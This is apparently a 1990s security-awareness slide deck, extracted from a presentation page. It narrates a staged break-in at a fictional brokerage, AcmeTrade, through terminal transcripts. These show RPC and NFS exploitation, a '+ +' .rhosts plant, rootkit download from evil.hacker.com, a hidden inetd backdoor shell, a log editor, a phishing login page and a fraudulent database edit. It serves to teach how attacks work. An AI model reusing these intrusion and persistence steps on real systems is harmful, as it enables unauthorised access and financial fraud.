Содержание
-
Пример атаки
-
-
WHOIS Search
-
ACMETRADE.COM
-
Registrant: Acmetrade.com, Inc. (ACMETRADE-DOM) 6600 Peachtree Dunwoody Road Atlanta, GA 30338 Domain Name: ACMETRADE.COM Administrative Contact: Vaughn, Danon (ES2394) dvaughn@ACMETRADE.COM (678)443-6000 (FAX) (678) 443-6476 Technical Contact, Zone Contact: Bergman, Bret (ET2324) bbergman@ACMETRADE.COM (678)443-6100 (FAX) (678) 443-6208 Billing Contact: Fields, Hope (ET3427) hfields@ACMETRADE.COM (678)443-6101 (FAX) (678) 443-6401 Record Last updated on 27-Jul-99. Record created on 06-Mar-98. Database last updated on 4-Oct-99 09:09:01 EDT Domain servers in listed order: dns.acmetrade.com 208.21.2.67 www.acmetrade.com 208.21.2.10 www1.acmetrade.com 208.21.2.12 www2.acmetrade.com 208.21.2.103 http://www.networksolutions.com/cgi-bin/whois/whois/?STRING=acmetrade.com
-
hacker:/export/home/hacker> ./rpcscan dns.acmetrade.com cmsd Scanning dns.acmetrade.com for program 100068 cmsd is on port 33505 hacker:/export/home/hacker>
-
-
-
hacker:/export/home/hacker> id uid=1002(hacker) gid=10(staff) hacker:/export/home/hacker> uname -a SunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Engine hacker:/export/home/hacker> ./cmsd dns.acmetrade.com using source port 53 rtable_create worked Exploit successful. Portshell created on port 33505 hacker:/export/home/hacker> Trying 208.21.2.67... Connected to dns.acmetrade.com. Escape character is '^]'. # id uid=0(root) gid=0(root) # uname -a SunOS dns 5.5.1 Generic_103640-24 sun4m sparc SUNW,SPARCstation-5 # telnet dns.acmetrade.com 33505
-
# # nslookup Default Server: dns.acmetrade.com Address: 208.21.2.67 > > ls acmetrade.com Received 15 records. ^D [dns.acmetrade.com] www.acmetrade.com 208.21.2.10 www1.acmetrade.com 208.21.2.12 www2.acmetrade.com 208.21.2.103 margin.acmetrade.com 208.21.4.10 marketorder.acmetrade.com 208.21.2.62 deriv.acmetrade.com 208.21.2.25 deriv1.acmetrade.com 208.21.2.13 bond.acmetrade.com 208.21.2.33 ibd.acmetrade.com 208.21.2.27 fideriv.acmetrade.com 208.21.4.42 backoffice.acmetrade.com 208.21.4.45 wiley.acmetrade.com 208.21.2.29 bugs.acmetrade.com 208.21.2.89 fw.acmetrade.com 208.21.2.94 fw1.acmetrade.com 208.21.2.21
-
# # # # rpcinfo -p www.acmetrade.com | grep mountd 100005 1 udp 643 mountd 100005 1 tcp 647 mountd showmount -e www.acmetrade.com /usr/local server2, server3, server4 /export/home sunspot rpcinfo -p www1.acmetrade.com | grep mountd 100005 1 udp 643 mountd 100005 1 tcp 647 mountd showmount -e www1.acmetrade.com /data1 server2 /a engineering /b engineering /c engineering /export/home (everyone) export list for www.acmetrade.com: #
-
nfs
-
nfsshell.c
-
/data1 server2 /a engineering /b engineering /c engineering /export/home (everyone) Export list for www1.acmetrade.com: nfs> mount /export/home Mount www1.acmetrade.com[208.21.2.12]:/export/home nfs> ls bill bob celeste chuck dan dave jenn zack nfs> ls –l bob drwxr-xr-x 2 201 1 1024 May 4 1999 bob - protocol: UDP/IP - transfer size: 8192 bytes nfs> nfs> nfs> cd bob uid 201 gid 1 # nfsshell nfs> host www1.acmetrade.com Open www1.acmetrade.com[208.21.1.12] (mountd) using UDP/IP nfs> export
-
nfs> status User id : 201 Group id : 1 Remote host : ‘www1.acmetrade.com’ Mount path : ‘/export/home’ Transfer size: 8192 nfs> !sh $ echo "+ +" > .rhosts $ exit nfs> nfs> put .rhosts cat .rhosts + + nfs> exit # rlogin -l bob www1.acmetrade.com Last login: Wed Mar 3 10:46:52 from somebox.internal.acmetrade.com www1% whoami bob www1% pwd /export/home/bob www1% uname -a SunOS www1.acmetrade.com 5.5.1 Generic_103640-24 sun4d SUNW,SPARCserver-1000 www1% cat .rhosts + +
-
-
-
www1% www1% ls -la /usr/bin/eject -r-sr-xr-x 1 root bin 13144 Jul 15 1997 /usr/bin/eject* www1% gcc -o eject_overflow eject_overflow.c www1% ./eject_overflow Jumping to address 0xeffff630 B[364] E[400] SO[400] # whoami root # ftp evil.hacker.com Connected to evil.hacker.com. Name (evil.hacker.com:root): 331 Password required for hacker. Password: 230 User hacker logged in. Remote system type is UNIX. Using binary mode to transfer files. hacker eye0wnu 220 evil.hacker.com FTP server (HackerOS) ready.
-
ftp> cd solaris_backdoors 250 CWD command successful. ftp> get solaris_backdoor.tar.gz 200 PORT command successful. 150 Binary data connection for out 3.1.33.7,1152). 226 Transfer complete. 152323 bytes sent in 31.942233 secs (4.7Kbytes/sec) ftp> quit tar -xf module_backdoor.tar cd /tmp/my_tools gunzip module_backdoor.tar.gz # # #
-
# cd /tmp/my_tools/module_backdoor # ./configure Enter directories and filenames to hide from ls, find, du: # make gcc -c backdoor.c gcc -o installer installer.c ld –o backdoor –r backdoor.o # Makefile backdoor backdoor.c backdoor.o config.h configure installer installer.c ls # # modload backdoor ./installer -d /usr/local/share/... Adding directory... Fixing last modified time... Fixing last accessed time... ... backdoor Enter class C network to hide from netstat: Enter process names to hide from ps and lsof: creating config.h... 3.1.33.0 sniffer
-
# ls -la /usr/local/share/... ...: No such file or directory # # # # # # ./installer backdoor /usr/local/share/.../backdoor Installing file... Fixing last modified time... Fixing last accessed time... echo "/usr/sbin/modload /usr/local/share/.../backdoor" >>/etc/init.d/utmpd # cd .. rm -rf module_backdoor ls inetd_backdoor/ logedit sniffer ./installer sniffer /usr/local/share/.../sniffer Installing file... Fixing last modified time... Fixing last accessed time... ls /usr/local/share/.../sniffer /usr/local/share/.../sniffer: No such file or directory # cd /usr/local/share/... # ./sniffer > out & # ps -aef | grep sniffer #
-
# netstat TCP Local Address Remote Address Swind Send-Q Rwind Recv-Q State -------------------- -------------------- ----- ------ ----- ------ ------- 208.21.2.10.1023 208.21.0.19.2049 8760 0 8760 648 ESTABLISHED 208.21.2.10.1022 208.21.0.19.2049 8760 0 8760 0 ESTABLISHED 208.21.2.10.2049 208.21.0.13.1003 8760 0 8760 0 ESTABLISHED # cd /tmp/my_tools # cd inetd_backdoor # ls config.h configure inetd.c installer.c # ./configure Enter port for hidden shell: # make gcc -s -DSYSV=4 -D__svr4__ -DSOLARIS -o inetd inetd.c -lnsl -lsocket -lresolv gcc -o installer installer.c # installer inetd /usr/sbin/inetd Installing file... Fixing last modified time... Fixing last accessed time... creating config.h... creating Makefile... 31337
-
Trying 208.21.2.12... Escape character is '^]'. telnet www1.acmetrade.com 31337 Granting rootshell... # hostname www1 # whoami root # # ps –aef | grep inetd root 179 1 0 May 10 ? 1:26 /usr/sbin/inetd -s # # kill –9 179 # exit /usr/sbin/inetd –s & Connection closed by foreign host. hacker:/export/home/hacker>
-
hacker:/export/home/hacker> ftp www1.acmetrade.com Connected to www1 220 www1.acmetrade.com FTP service (Version 2.5). Name: root 331 Password required for root. Password: ******* 230 User root logged in. Remote system type is Unix. ftp> put backdoor.html securelogin.html 200 PORT command successful. 150 Opening BINARY mode data connection for index.html 226 Transfer complete. ftp> quit 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. total 10 -rwxr-xr-x 9 root other 1024 Aug 17 17:07 . -rwxr-xr-x 9 root other 1024 Aug 17 17:07 .. -rwxr-xr-x 2 www www 2034 Aug 17 17:07 index.html -rwxr-xr-x 2 www www 1244 Aug 17 17:07 securelogin.html -rwxr-xr-x 2 www www 1024 Aug 17 17:07 image2.gif -rwxr-x--x 6 www www 877 Aug 17 17:07 title.gif -rwxr-xr-x 2 www www 1314 Aug 17 17:07 frontpage.jpg 226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec) ftp> dir ftp> cd /usr/local/httpd
-
program vers proto port service 100000 4 tcp 111 rpcbind 100000 3 tcp 111 rpcbind 100000 2 tcp 111 rpcbind 100000 4 udp 111 rpcbind 100000 3 udp 111 rpcbind 100000 2 udp 111 rpcbind 100004 2 udp 753 ypserv 100004 1 udp 753 ypserv 100004 1 tcp 754 ypserv 100004 2 tcp 32771 ypserv 1073741824 2 udp 32772 100007 3 udp 32779 ypbind 100007 2 udp 32779 ypbind 100007 1 udp 32779 ypbind 100007 3 tcp 32772 ypbind 100007 2 tcp 32772 ypbind 100007 1 tcp 32772 ypbind 100011 1 udp 32781 rquotad 100068 2 udp 32783 100068 3 udp 32783 100068 4 udp 32783 100068 5 udp 32783 100024 1 udp 32784 status 100024 1 tcp 32777 status 100021 1 udp 4045 nlockmgr 100021 2 udp 4045 nlockmgr # rpcinfo -p backoffice.acmetrade.com
-
100021 3 udp 4045 nlockmgr 100021 4 udp 4045 nlockmgr 100021 1 tcp 4045 nlockmgr 100021 2 tcp 4045 nlockmgr 100021 3 tcp 4045 nlockmgr 100021 4 tcp 4045 nlockmgr 100005 1 udp 33184 mountd 100005 2 udp 33184 mountd 100005 3 udp 33184 mountd 100005 1 tcp 32787 mountd 100005 2 tcp 32787 mountd 100005 3 tcp 32787 mountd 100083 1 tcp 32773 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 100227 2 udp 2049 nfs_acl 100227 3 udp 2049 nfs_acl 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100227 2 tcp 2049 nfs_acl 100227 3 tcp 2049 nfs_acl # # grep ttdbserverd /etc/inetd.conf 100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd rpcinfo -p backoffice.acmetrade.com | grep 100083 100083 1 tcp 32773 # cd /tmp/mytools/warez
-
Please wait for your root shell. # ./tt backoffice.acmetrade.com hostname backoffice whoami root # find / -type f -name .rhosts -print /.rhosts /export/home/chuck/.rhosts /export/home/bill/.rhosts /export/home/larry/.rhosts # cat /.rhosts fideriv.acmetrade root ibd.acmetrade root bugs.acmetrade root # w 10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03 User tty login@ idle JCPU PCPU what root console 9:27am 147:52 14:41 14:14 /sbin/sh root pts/5 9:24pm /sbin/sh # # # /tmp/mytools/logedit root pts/5 # w 10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03 User tty login@ idle JCPU PCPU what root console 9:27am 147:52 14:41 14:14 /sbin/sh
-
# sqlplus oracle/oracle SQL> describe customers Name Null? Type ------------------ -------- ----------- LNAME NOT NULL VARCHAR2(20) FNAME NOT NULL VARCHAR2(15) ADDR1 NOT NULL VARCHAR2(30) ZIP NOT NULL NUMBER(5) PHONE NOT NULL CHAR(12) ACCOUNT_NUM NOT NULL NUMBER(12) BALANCE NOT NULL NUMBER(12) MARGIN_LIMIT NOT NULL NUMBER(12) ACCT_OPEN NOT NULL DATE SQL> select LNAME, FNAME, ACCOUNT_NUM, MARGIN_LIMIT from customers where LNAME = 'Gerulski'; LNAME FNAME ACCOUNT_NUM MARGIN_LIMIT -------------------- ------------- ----------- ------------ Gerulski David 5820981 50000.00 SQL> update customers set MARGIN_LIMIT = 500000.00 where LNAME = 'Gerulski'; SQL> select LNAME, MARGIN_LIMIT from customers where LNAME = 'Gerulski'; LNAME MARGIN_LIMIT ------------------- ------------ Gerulski 500000.00 SQL> exit
-
-
Anatomy of the Attack
AcmeTrade’s Network UNIX Firewall DNS Server Web Server Filtering Router NT Clients & Workstations Network UNIX NT UNIX rpc.cmsd nfs / eject tooltalk /oracle
-
What is Vulnerable?
IT Infrastructure Firewall E-Mail Server Web Server Router Servers Clients & Workstations Network
-
Applications Router E-Commerce Web Server E-Mail Server Firewall SAP Peoplesoft Web Browsers
-
Databases Firewall Router Oracle Microsoft SQL Server Sybase
-
Firewall AIX Solaris Router Windows NT Network Operating Systems HP-UX Windows 95 & NT
-
Firewall E-Mail Server Web Server Router Servers Networks TCP/IP Netware
Нет комментариев для данной презентации
Помогите другим пользователям — будьте первым, кто поделится своим мнением об этой презентации.